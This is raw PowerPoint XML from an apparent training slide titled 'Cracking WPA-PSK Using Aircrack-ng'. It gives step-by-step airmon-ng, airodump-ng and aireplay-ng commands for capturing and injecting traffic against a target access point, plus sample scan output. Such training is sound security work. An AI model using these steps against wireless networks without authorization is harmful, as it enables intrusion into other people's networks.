                  <a:gd name="T1" fmla="*/ 1817 h 1818"/>
                  <a:gd name="T2" fmla="*/ 0 w 4869"/>
                  <a:gd name="T3" fmla="*/ 1817 h 1818"/>
                  <a:gd name="T4" fmla="*/ 0 w 4869"/>
                  <a:gd name="T5" fmla="*/ 0 h 1818"/>
                  <a:gd name="T6" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T7" fmla="*/ 0 h 1818"/>
                  <a:gd name="T8" fmla="*/ 4173 w 4869"/>
                  <a:gd name="T9" fmla="*/ 912 h 1818"/>
                  <a:gd name="T10" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T11" fmla="*/ 1817 h 1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69" h="1818">
                    <a:moveTo>
                      <a:pt x="4868" y="1817"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4868" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4173" y="912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4868" y="1817"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="162F3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21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" name="Text Box 106">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{646B80F0-E699-4B85-9126-0D5FB49251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flipH="1">
                <a:off x="10310914" y="2440210"/>
                <a:ext cx="1776513" cy="35466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/>
              <a:lstStyle>
                <a:lvl1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1pPr>
                <a:lvl2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2pPr>
                <a:lvl3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3pPr>
                <a:lvl4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4pPr>
                <a:lvl5pPr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5pPr>
                <a:lvl6pPr marL="2514600" indent="-228600" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="93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charset="0"/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6pPr>
                <a:lvl7pPr marL="2971800" indent="-228600" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="93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charset="0"/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7pPr>
                <a:lvl8pPr marL="3429000" indent="-228600" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="93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charset="0"/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8pPr>
                <a:lvl9pPr marL="3886200" indent="-228600" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="93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000000"/>
                  </a:buClr>
                  <a:buSzPct val="100000"/>
                  <a:buFont typeface="Times New Roman" charset="0"/>
                  <a:tabLst>
                    <a:tab pos="0" algn="l"/>
                    <a:tab pos="457200" algn="l"/>
                    <a:tab pos="914400" algn="l"/>
                    <a:tab pos="1371600" algn="l"/>
                    <a:tab pos="1828800" algn="l"/>
                    <a:tab pos="2286000" algn="l"/>
                    <a:tab pos="2743200" algn="l"/>
                    <a:tab pos="3200400" algn="l"/>
                    <a:tab pos="3657600" algn="l"/>
                    <a:tab pos="4114800" algn="l"/>
                    <a:tab pos="4572000" algn="l"/>
                    <a:tab pos="5029200" algn="l"/>
                    <a:tab pos="5486400" algn="l"/>
                    <a:tab pos="5943600" algn="l"/>
                    <a:tab pos="6400800" algn="l"/>
                    <a:tab pos="6858000" algn="l"/>
                    <a:tab pos="7315200" algn="l"/>
                    <a:tab pos="7772400" algn="l"/>
                    <a:tab pos="8229600" algn="l"/>
                    <a:tab pos="8686800" algn="l"/>
                    <a:tab pos="9144000" algn="l"/>
                  </a:tabLst>
                  <a:defRPr>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Arial" charset="0"/>
                    <a:ea typeface="SimSun" charset="0"/>
                    <a:cs typeface="SimSun" charset="0"/>
                  </a:defRPr>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914217" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                  <a:lnSpc>
                    <a:spcPct val="11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0" algn="l"/>
                    <a:tab pos="228600" algn="l"/>
                    <a:tab pos="457200" algn="l"/>
                    <a:tab pos="685800" algn="l"/>
                    <a:tab pos="914400" algn="l"/>
                    <a:tab pos="1143000" algn="l"/>
                    <a:tab pos="1371600" algn="l"/>
                    <a:tab pos="1600200" algn="l"/>
                    <a:tab pos="1828800" algn="l"/>
                    <a:tab pos="2057400" algn="l"/>
                    <a:tab pos="2286000" algn="l"/>
                    <a:tab pos="2514600" algn="l"/>
                    <a:tab pos="2743200" algn="l"/>
                    <a:tab pos="2971800" algn="l"/>
                    <a:tab pos="3200400" algn="l"/>
                    <a:tab pos="3429000" algn="l"/>
                    <a:tab pos="3657600" algn="l"/>
                    <a:tab pos="3886200" algn="l"/>
                    <a:tab pos="4114800" algn="l"/>
                    <a:tab pos="4343400" algn="l"/>
                    <a:tab pos="4572000" algn="l"/>
                  </a:tabLst>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" sz="500" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:srgbClr val="F1F0F0"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                    <a:ea typeface="SimSun" charset="0"/>
                    <a:cs typeface="Roboto Black" charset="0"/>
                  </a:rPr>
                  <a:t>OPTION 01</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="Freeform 107">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6506B88-05DE-431C-B2DC-E5E049E66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9691313" y="2247258"/>
                <a:ext cx="2672030" cy="757104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T1" fmla="*/ 1817 h 1818"/>
                  <a:gd name="T2" fmla="*/ 0 w 4869"/>
                  <a:gd name="T3" fmla="*/ 1817 h 1818"/>
                  <a:gd name="T4" fmla="*/ 0 w 4869"/>
                  <a:gd name="T5" fmla="*/ 0 h 1818"/>
                  <a:gd name="T6" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T7" fmla="*/ 0 h 1818"/>
                  <a:gd name="T8" fmla="*/ 4173 w 4869"/>
                  <a:gd name="T9" fmla="*/ 912 h 1818"/>
                  <a:gd name="T10" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T11" fmla="*/ 1817 h 1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69" h="1818">
                    <a:moveTo>
                      <a:pt x="4868" y="1817"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4868" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4173" y="912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4868" y="1817"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="E8E8E8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defTabSz="91421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43" name="Rectangle 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{237B3961-5DD2-42A2-9AE5-4997E1ADE996}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8122826" y="1590840"/>
            <a:ext cx="756676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r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Step 4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3AC9223A-D5B7-41E8-A06B-29AB3F41F39F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8951453" y="1341772"/>
            <a:ext cx="2758749" cy="523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US" sz="1400" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Inject packets using aireplay-ng to generate traffic on the target AP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2786182293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tle 41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667000" y="-762000"/>
            <a:ext cx="8229600" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/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33912061-24D0-42F2-9045-DB86013D1C50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141413" y="97242"/>
            <a:ext cx="9909175" cy="708804"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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Cracking WPA-PSK Using Aircrack-ng</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" b="1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</a:endParaRP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253B5E94-6006-4C10-A23B-2847246FBA41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="212353" y="3884516"/>
            <a:ext cx="6430347" cy="2560669"/>
            <a:chOff x="152400" y="3874404"/>
            <a:chExt cx="6430347" cy="2560669"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="87" name="Rectangle 86">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4770D14-6A7E-4942-8C27-14A13FCA37B6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="152400" y="3874753"/>
              <a:ext cx="6430347" cy="2560320"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BFBFBF"/>
            </a:solidFill>
            <a:ln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none" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mj-lt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C0837D9B-8B6B-43F7-9A7C-2811E97E8E73}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="217967" y="3874404"/>
              <a:ext cx="6335233" cy="2497220"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:ln w="76200"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none" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="89" name="Picture 88" descr="X:\Web2.0 PNG Icons\wifi\Scroll-bar vertical.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1CD446C-4C8F-4415-9D7F-CC08D6DCC974}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr preferRelativeResize="0"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56084" y="4214401"/>
              <a:ext cx="191193" cy="215131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2926E5FA-3C1D-4867-A6CB-8EE630DF121C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="152400" y="3875089"/>
              <a:ext cx="6430347" cy="336941"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BFBFBF"/>
            </a:solidFill>
            <a:ln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none" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp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9785CE75-8585-4294-8CC4-C0C3C8FC648B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="643578" y="3881757"/>
              <a:ext cx="1585692" cy="30777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600" b="1" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Command Prompt</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="92" name="Picture 3" descr="E:\Web2.0 PNG Icons\Windows Command.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5ADE8DE4-0FEF-46AF-A092-2B251E0113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8224" y="3882242"/>
              <a:ext cx="361986" cy="31798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3" name="Picture 3" descr="X:\Maqbool\Icons\x.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{617541E4-A740-46AF-AB74-7103E0C1DD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76340" y="3909060"/>
              <a:ext cx="251460" cy="25146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5541D8D8-D82C-4417-8FC9-CA0430A703F3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="211766" y="4217185"/>
              <a:ext cx="6322811" cy="2154436"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst>
              <a:innerShdw blurRad="114300">
                <a:prstClr val="black"/>
              </a:innerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="105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C:\&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="11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airmon-ng start eth1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="105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C:\&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFC000"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>airodump-ng  --write capture eth1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="105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BSSID                          PWR    RXQ     Beacons    #Data,   #/s    CH    MB    ENC    CIPHER    AUTH    ESSID</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="105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02:24:2B:CD:68:EF     99         5            60               3          0       1     54e    OPN               	                  IAMROGER</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="105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02:24:2B:CD:68:EE     99         9            75               2          0       5     54e    WPA     TKIP        PSK      COMPANYZONE</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="105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00:14:6C:95:6C:FC      99         0            15               0          0       9     54e    WEP     WEP                     HOME</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="110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1E:64:51:3B:FF:3E</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="105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    76        70          157              1          0      11    54e    WEP     WEP                     SECRET_SSID</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="105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BSSID                          Station                         PWR      Rate      Lost     Packets    Probes</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>1E:64:51:3B:FF:3E</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="105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    00:17:9A:C3:CF:C2       -1         1 - 0          0               1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>1E:64:51:3B:FF:3E</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    00:1F:5B:BA:A7:CD     76        1e-54        0               6</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Rectangle 94">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8DB30EF-BE22-44D1-9352-082A631C1E8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360513" y="1589773"/>
            <a:ext cx="4007514" cy="76944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>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Monitor wireless traffic with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>airmon-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\&gt;airmon-ng start eth1</a:t>
            </a:r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2310AC88-B099-4C9A-83B9-DE688198DA74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360513" y="3068719"/>
            <a:ext cx="4932689" cy="69249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>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Collect wireless traffic data with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>airodump-ng</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\&gt;airodump-ng --write capture eth1</a:t>
            </a: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D3D4AD58-6659-4AA7-A7F9-54D56CB92141}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360513" y="1243058"/>
            <a:ext cx="843693" cy="3693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r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Step 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
            </a:endParaRPr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D27DF841-FF1F-46A2-AC29-7C58CB8F2C0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360513" y="2763229"/>
            <a:ext cx="843693" cy="3693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r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Step 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="99" name="Group 98">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CECE029-B1E4-4188-93D5-FF68E641EF7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6978557" y="1905468"/>
            <a:ext cx="4851653" cy="892658"/>
            <a:chOff x="1453530" y="1791628"/>
            <a:chExt cx="4803617" cy="892658"/>
          </a:xfrm>
        </p:grpSpPr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F2162BCC-383F-4915-8A0E-BD7688D91265}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1466230" y="1806462"/>
              <a:ext cx="4790917" cy="877824"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BFBFBF"/>
            </a:solidFill>
            <a:ln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none" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp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CDA3E267-3911-46F0-BC7A-05EEE486B9DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1498727" y="1829083"/>
              <a:ext cx="4733020" cy="814876"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:ln w="76200"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none" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0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30F5F7FA-9D4B-4284-9A83-72F29A1F5FCB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1453530" y="1791628"/>
              <a:ext cx="4790917" cy="370635"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BFBFBF"/>
            </a:solidFill>
            <a:ln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none" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp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4C8BC14B-0EE4-40EE-9CB8-81CAECC7B91F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1964267" y="1809021"/>
              <a:ext cx="1744261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600" b="1" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
